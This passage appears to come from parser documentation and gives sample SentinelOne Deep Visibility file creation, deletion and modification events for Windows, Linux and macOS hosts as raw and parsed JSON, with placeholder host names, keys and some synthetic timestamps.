\"737373ABCDEF7373\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628515733666\"}, \"path\": \"C:\\\\Users\\\\user.name\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\", \"owner\": {}, \"isDir\": \"test_not_E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"event_type\": \"fileCreation\"}", - "event": { - "action": "fileCreation", - "start": "2206-11-13T06:23:32.121000Z" - }, - "agent": { - "version": "S1-WIN/2.2.11.333" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 35, - "trace_id": "BABABABABEEE43452345234523423423", - "uuid": "4d311e18709146cba871111111111111" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "737373ABCDEF7373" - } - }, - "host": { - "os": { - "revision": "88888" - } - }, - "process": { - "counters": { - "cross_process": 1610, - "cross_process_dup_process_handle": 1590, - "cross_process_dup_thread_handle": 20, - "file_creation": 148, - "file_deletion": 58, - "file_modification": 416, - "model_child_process": 25, - "module_load": 245, - "os_child_process": 25, - "registry_modification": 32 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "C8E88AA83F5B15B6" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2442584", - "start": "2021-08-05T07:45:42.456000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "BAE25D38782A6941" - }, - "parent": { - "node": { - "key": "03267F6915111A61" - } - }, - "root": "E_TRUE", - "session_id": 11, - "true_context": { - "key": "CCC43343435EABDF" - }, - "user": { - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - } - }, - "true_context": { - "key": "CCC43343435EABDF" - } - }, - "file": { 
- "created": "2021-08-09T13:28:53.666000Z", - "directory": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome", - "name": "User Data", - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data", - "type": "dir" - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "name": "chrome.exe", - "pid": 14896, - "start": "2021-08-09T13:28:53.321000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-6562365326-8585787878-2021012021-6543", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "file_creation2.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 35, \"uuid\": \"4d311e18709146cba871111111111111\", \"traceId\": \"BABABABABEEE43452345234523423423\", \"agentVersion\": \"S1-WIN/2.2.11.333\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"88888\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"7474746212121\"}, \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"BAE25D38782A6941\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"C8E88AA83F5B15B6\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628149542654\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2442584\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program 
Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 14896, \"startTime\": {\"millisecondsSinceEpoch\": \"1628515733932\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-6562365326-8585787878-2021012021-6543\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"03267F6915111A61\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 11, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"counters\": {\"modelChildProcess\": 25, \"osChildProcess\": 25, \"crossProcess\": 1610, \"moduleLoad\": 245, \"fileCreation\": 148, \"fileDeletion\": 58, \"fileModification\": 416, \"registryModification\": 32, \"crossProcessDupThreadHandle\": 20, \"crossProcessDupProcessHandle\": 1590}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"737373ABCDEF7373\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"7474746212121\"}, \"path\": \"C:\\\\Users\\\\user.name\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\98798798-bbb2-9898-aaaa-1212121212f.tmp\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"event_type\": \"fileCreation\"}", - "event": { - "action": "fileCreation", - "start": "2206-11-13T06:23:32.121000Z" - }, - "agent": { - "version": "S1-WIN/2.2.11.333" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 35, - "trace_id": "BABABABABEEE43452345234523423423", - "uuid": "4d311e18709146cba871111111111111" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "737373ABCDEF7373" - } - }, - "host": { - "os": { - "revision": "88888" - } - }, - "process": { - "counters": { - "cross_process": 1610, - 
"cross_process_dup_process_handle": 1590, - "cross_process_dup_thread_handle": 20, - "file_creation": 148, - "file_deletion": 58, - "file_modification": 416, - "model_child_process": 25, - "module_load": 245, - "os_child_process": 25, - "registry_modification": 32 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "C8E88AA83F5B15B6" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2442584", - "start": "2021-08-05T07:45:42.654000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "BAE25D38782A6941" - }, - "parent": { - "node": { - "key": "03267F6915111A61" - } - }, - "root": "E_TRUE", - "session_id": 11, - "true_context": { - "key": "CCC43343435EABDF" - }, - "user": { - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - } - }, - "true_context": { - "key": "CCC43343435EABDF" - } - }, - "file": { - "created": "2206-11-13T06:23:32.121000Z", - "extension": "tmp", - "name": "98798798-bbb2-9898-aaaa-1212121212f.tmp", - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data\\98798798-bbb2-9898-aaaa-1212121212f.tmp", - "type": "file" - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "name": "chrome.exe", - "pid": 14896, - "start": "2021-08-09T13:28:53.932000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-6562365326-8585787878-2021012021-6543", - "name": 
"CORP\\user.name" - } - } - - ``` - - -=== "file_creation3.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"123\",\"traceId\":\"123\",\"agentVersion\":\"S1-WIN/21.7.7.40005\",\"osFamily\":\"windows\",\"osName\":\"Windows Server 2019 Standard\",\"osRevision\":\"17763\",\"computerName\":\"123\",\"machineType\":\"server\",\"mgmtUrl\":\"https://foo.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1660727585201\"},\"event_type\":\"fileCreation\",\"trueContext\":{\"key\":{\"value\":\"CB18415B7D5C7DC1\"}},\"source\":{\"node\":{\"key\":{\"value\":\"D65452060133453B\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"3EFA3EFA3EFA3EFA\"}},\"creationTime\":{},\"owner\":{},\"hashes\":{}},\"fullPid\":{\"pid\":22545,\"startTime\":{\"millisecondsSinceEpoch\":\"1660727582129\"}},\"user\":{},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"Unknown file\",\"root\":\"E_TRUE\",\"subsystem\":\"SYS_WIN32\",\"sessionId\":4294967295,\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"CB18415B7D5C7DC1\"}},\"counters\":{\"fileCreation\":3,\"fileModification\":6}},\"targetFile\":{\"node\":{\"key\":{\"value\":\"39AD9E819F6BE850\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1660727585201\"},\"path\":\"Anonymized Data\",\"owner\":{},\"isDir\":\"E_FALSE\",\"hashes\":{},\"fileLocation\":\"Local\"}}\n", - "event": { - "action": "fileCreation", - "start": "2022-08-17T09:13:05.201000Z" - }, - "agent": { - "version": "S1-WIN/21.7.7.40005" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://foo.sentinelone.net", - "trace_id": "123", - "uuid": "123" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "39AD9E819F6BE850" - } - }, - "host": { - "os": { - "revision": "17763" - } - }, - "process": { - "counters": { - "file_creation": 3, - "file_modification": 6 - }, - 
"excluded": "E_FALSE", - "executable": { - "node": { - "key": "3EFA3EFA3EFA3EFA" - } - }, - "family": "SYS_WIN32", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "D65452060133453B" - }, - "root": "E_TRUE", - "session_id": 4294967295, - "true_context": { - "key": "CB18415B7D5C7DC1" - } - }, - "true_context": { - "key": "CB18415B7D5C7DC1" - } - }, - "file": { - "created": "2022-08-17T09:13:05.201000Z", - "extension": "Anonymized Data", - "name": "Anonymized Data", - "path": "Anonymized Data", - "type": "file" - }, - "host": { - "name": "123", - "os": { - "family": "windows", - "name": "Windows Server 2019 Standard" - }, - "type": "server" - }, - "process": { - "pid": 22545, - "start": "2022-08-17T09:13:02.129000Z", - "title": "Unknown file" - } - } - - ``` - - -=== "file_creation_missing_fields.json" - - ```json - - { - "message": "{\"timestamp\": {\"millisecondsSinceEpoch\": \"1629899209700\"}, \"meta\": {\"seqId\": 45, \"uuid\": \"6ce43ff9d060310b37fb4eba7ad3c1f0f2d9a5ab\", \"traceId\": \"E1A04C7727EB41E5A3D0FF068D4BE544\", \"agentVersion\": \"S1-WIN/4.4.3.149\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19043\", \"computerName\": \"LAPTOP-COM4\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"trueContext\": {\"key\": {\"value\": \"0506A768B8828E35\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"2FFCA561EE506063\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"E4CD922E494CA3C5\"}}, \"creationTime\": {}, \"path\": \"C:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiESNAC.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"4253328\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"FortiESNAC.exe -s FC_{73EFB30F-1CAD-4a7a-AE2E-150282B6CE25}_000018\", \"fullPid\": {\"pid\": 6104, \"startTime\": {\"millisecondsSinceEpoch\": \"1629878298032\"}}, \"user\": {\"name\": \"AUTORITE 
NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"D3250A9CB211CC1E\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"FortiClient Network Access Control\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"0506A768B8828E35\"}}, \"counters\": {\"moduleLoad\": 1948, \"fileCreation\": 647, \"fileDeletion\": 647, \"fileModification\": 2141, \"exeModification\": 40, \"netConnOut\": 203, \"registryModification\": 654, \"dnsLookups\": 30}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"4685AD1C6BC7D31D\"}}, \"creationTime\": {}, \"path\": \"C:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\large_data_upload\\\\0.bin\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"event_type\": \"fileCreation\"}", - "event": { - "action": "fileCreation", - "start": "2021-08-25T13:46:49.700000Z" - }, - "agent": { - "version": "S1-WIN/4.4.3.149" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 45, - "trace_id": "E1A04C7727EB41E5A3D0FF068D4BE544", - "uuid": "6ce43ff9d060310b37fb4eba7ad3c1f0f2d9a5ab" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "4685AD1C6BC7D31D" - } - }, - "host": { - "os": { - "revision": "19043" - } - }, - "process": { - "counters": { - "dns_lookups": 30, - "file_creation": 647, - "file_deletion": 647, - "file_modification": 2141, - "module_load": 1948, - "net_conn_out": 203, - "registry_modification": 654 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Fortinet\\FortiClient\\FortiESNAC.exe", - "node": { - "key": "E4CD922E494CA3C5" - }, - "size_bytes": "4253328" - }, - "family": "SYS_WIN32", - 
"integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "2FFCA561EE506063" - }, - "parent": { - "node": { - "key": "D3250A9CB211CC1E" - } - }, - "root": "E_FALSE", - "true_context": { - "key": "0506A768B8828E35" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "true_context": { - "key": "0506A768B8828E35" - } - }, - "file": { - "extension": "bin", - "name": "0.bin", - "path": "C:\\Program Files\\Fortinet\\FortiClient\\large_data_upload\\0.bin", - "type": "file" - }, - "host": { - "name": "LAPTOP-COM4", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "FortiESNAC.exe -s FC_{73EFB30F-1CAD-4a7a-AE2E-150282B6CE25}_000018", - "executable": "C:\\Program Files\\Fortinet\\FortiClient\\FortiESNAC.exe", - "name": "FortiESNAC.exe", - "pid": 6104, - "start": "2021-08-25T07:58:18.032000Z", - "title": "FortiClient Network Access Control", - "working_directory": "C:\\Program Files\\Fortinet\\FortiClient" - }, - "related": { - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "file_deletion.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFJG3VW54HS5577EY3CY83M8\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634706079\"}, \"event_type\": \"fileDeletion\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"0D7A69B0C2C26E73\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": 
\"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 26188, \"startTime\": {\"millisecondsSinceEpoch\": \"1631516876708\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"41CA3A862279A7BC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"modelChildProcess\": 761, \"osChildProcess\": 761, \"crossProcess\": 332191, \"moduleLoad\": 1177, \"fileCreation\": 295369, \"fileDeletion\": 282078, \"fileModification\": 849997, \"netConnOut\": 5, \"registryModification\": 788, \"crossProcessDupThreadHandle\": 2431, \"crossProcessDupProcessHandle\": 329760, \"dnsLookups\": 5}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"780E03EC9E64BBE3\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1631634705524\"}, \"path\": \"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Service Worker\\\\CacheStorage\\\\1ab01c3b969bd7dcc799e2be1a4ce60699f20543\\\\650d1e12-cd20-438f-8c15-b58c713de9c7\\\\todelete_429a860c9774094b_0_1.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", 
\"hashes\": {}, \"fileLocation\": \"Local\"}}", - "event": { - "action": "fileDeletion", - "start": "2021-09-14T15:51:46.079000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFJG3VW54HS5577EY3CY83M8", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "fileDeletion" - }, - "file": { - "location": "Local", - "node": { - "key": "780E03EC9E64BBE3" - } - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "cross_process": 332191, - "cross_process_dup_process_handle": 329760, - "cross_process_dup_thread_handle": 2431, - "dns_lookups": 5, - "file_creation": 295369, - "file_deletion": 282078, - "file_modification": 849997, - "model_child_process": 761, - "module_load": 1177, - "net_conn_out": 5, - "os_child_process": 761, - "registry_modification": 788 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "2021-09-02T08:59:58.477000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "0D7A69B0C2C26E73" - }, - "parent": { - "node": { - "key": "41CA3A862279A7BC" - } - }, - "root": "E_TRUE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "true_context": { - "key": "6B188EE5E8C5F24F" - } - }, - "file": { - "created": "2021-09-14T15:51:45.524000Z", - "extension": "exe", - "name": "todelete_429a860c9774094b_0_1.exe", - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service 
Worker\\CacheStorage\\1ab01c3b969bd7dcc799e2be1a4ce60699f20543\\650d1e12-cd20-438f-8c15-b58c713de9c7\\todelete_429a860c9774094b_0_1.exe", - "type": "file" - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "pid": 26188, - "start": "2021-09-13T07:07:56.708000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hash": [ - "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "a766188d75e570ea3f9b09fb9d82cb54", - "a82705f4f5d1408f7c14d16a9cbe26c509422b29" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "file_deletion_linux.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"185f2b1e-bdca-c6e2-91b0-520df717d799\",\"traceId\":\"01GBM84F2S5AZQSP200MBDS22Q\",\"agentVersion\":\"S1-LIN/22.2.2.2\",\"osFamily\":\"linux\",\"osName\":\"Linux\",\"osRevision\":\"Amazon 2 
4.14.246-187.474.amzn2.x86_64\",\"computerName\":\"ip-1-1-1-1.eu-west-1.compute.internal\",\"machineType\":\"server\",\"mgmtUrl\":\"https://euce1-103.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1661758224333\"},\"event_type\":\"fileModification\",\"trueContext\":{\"key\":{\"value\":\"0f4c8c9c-7440-2977-64af-11505a86f00d\"}},\"source\":{\"node\":{\"key\":{\"value\":\"0f4ca868-3233-c901-c895-a9716d0c7a59\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"0f4ca59e-5ecc-2161-c4e7-97ac79e4c629\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1630345715000\"},\"path\":\"/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node\",\"pUnix\":\"0\",\"owner\":{},\"sizeBytes\":\"48935408\",\"signature\":{\"unsigned\":{}},\"isKernelModule\":\"E_FALSE\",\"hashes\":{\"sha1\":\"837e6fbd33802ec0d56ac1bb3754af0046c9a220\"},\"fileLocation\":\"Local\"},\"commandLine\":\" node /usr/local/bin/npm install\",\"fullPid\":{\"pid\":12322,\"startTime\":{\"millisecondsSinceEpoch\":\"1661758222250\"}},\"user\":{\"name\":\"root\",\"sid\":\"3397\"},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{\"value\":\"0f4ca51a-f789-1621-a626-2b1b1c4a93f0\"}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"node\",\"root\":\"E_FALSE\",\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"0f4c8c9c-7440-2977-64af-11505a86f00d\"}},\"counters\":{\"fileCreation\":537,\"fileDeletion\":272,\"fileModification\":545,\"netConnOut\":10}},\"file\":{\"node\":{\"key\":{\"value\":\"0f4d14d9-ce0f-85db-b8b9-0b942faf064b\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1661758119966\"},\"path\":\"/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec/2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f\",\"pUnix\":\"0\",\"owner\":{},\"sizeBytes\":\"1347\",\"signature\":{\"unsigned\":
{}},\"isKernelModule\":\"E_FALSE\",\"hashes\":{},\"fileLocation\":\"Local\"},\"sizeBytes\":\"1347\",\"isKernelModule\":\"E_FALSE\",\"hashes\":{},\"oldHashes\":{\"sha1\":\"da39a3ee5e6b4b0d3255bfef95601890afd80709\"}}\n\n", - "event": { - "action": "fileModification", - "start": "2022-08-29T07:30:24.333000Z" - }, - "agent": { - "version": "S1-LIN/22.2.2.2" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-103.sentinelone.net", - "trace_id": "01GBM84F2S5AZQSP200MBDS22Q", - "uuid": "185f2b1e-bdca-c6e2-91b0-520df717d799" - }, - "event": { - "type": "fileModification" - }, - "file": { - "is_kernel_module": false, - "location": "Local" - }, - "host": { - "os": { - "revision": "Amazon 2 4.14.246-187.474.amzn2.x86_64" - } - }, - "process": { - "counters": { - "file_creation": 537, - "file_deletion": 272, - "file_modification": 545, - "net_conn_out": 10 - }, - "excluded": "E_FALSE", - "executable": { - "name": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node", - "node": { - "key": "0f4ca59e-5ecc-2161-c4e7-97ac79e4c629" - }, - "size_bytes": "48935408", - "start": "2021-08-30T17:48:35.000000Z" - }, - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "0f4ca868-3233-c901-c895-a9716d0c7a59" - }, - "parent": { - "node": { - "key": "0f4ca51a-f789-1621-a626-2b1b1c4a93f0" - } - }, - "root": "E_FALSE", - "true_context": { - "key": "0f4c8c9c-7440-2977-64af-11505a86f00d" - }, - "user": { - "sid": "3397" - } - }, - "true_context": { - "key": "0f4c8c9c-7440-2977-64af-11505a86f00d" - } - }, - "file": { - "created": "2022-08-29T07:28:39.966000Z", - "directory": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec", - "name": "2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f", - "path": 
"/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec/2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f", - "size": 1347, - "type": "dir" - }, - "host": { - "name": "ip-1-1-1-1.eu-west-1.compute.internal", - "os": { - "family": "linux", - "name": "Linux" - }, - "type": "server" - }, - "process": { - "command_line": " node /usr/local/bin/npm install", - "executable": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node", - "hash": { - "sha1": "837e6fbd33802ec0d56ac1bb3754af0046c9a220" - }, - "name": "node", - "pid": 12322, - "start": "2022-08-29T07:30:22.250000Z", - "title": "node" - }, - "related": { - "hash": [ - "837e6fbd33802ec0d56ac1bb3754af0046c9a220" - ], - "user": [ - "root" - ] - }, - "user": { - "id": "3397", - "name": "root" - } - } - - ``` - - -=== "file_deletion_osx.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"81A8A777-22BD-5CF8-9BF1-FD05875D9CD5\",\"traceId\":\"D9E5C5D4-33D7-43E1-AF54-4C70A938643D_1\",\"agentVersion\":\"S1-MAC/22.2.3.6268\",\"osFamily\":\"osx\",\"osName\":\"OS X\",\"osRevision\":\"12.5.1 
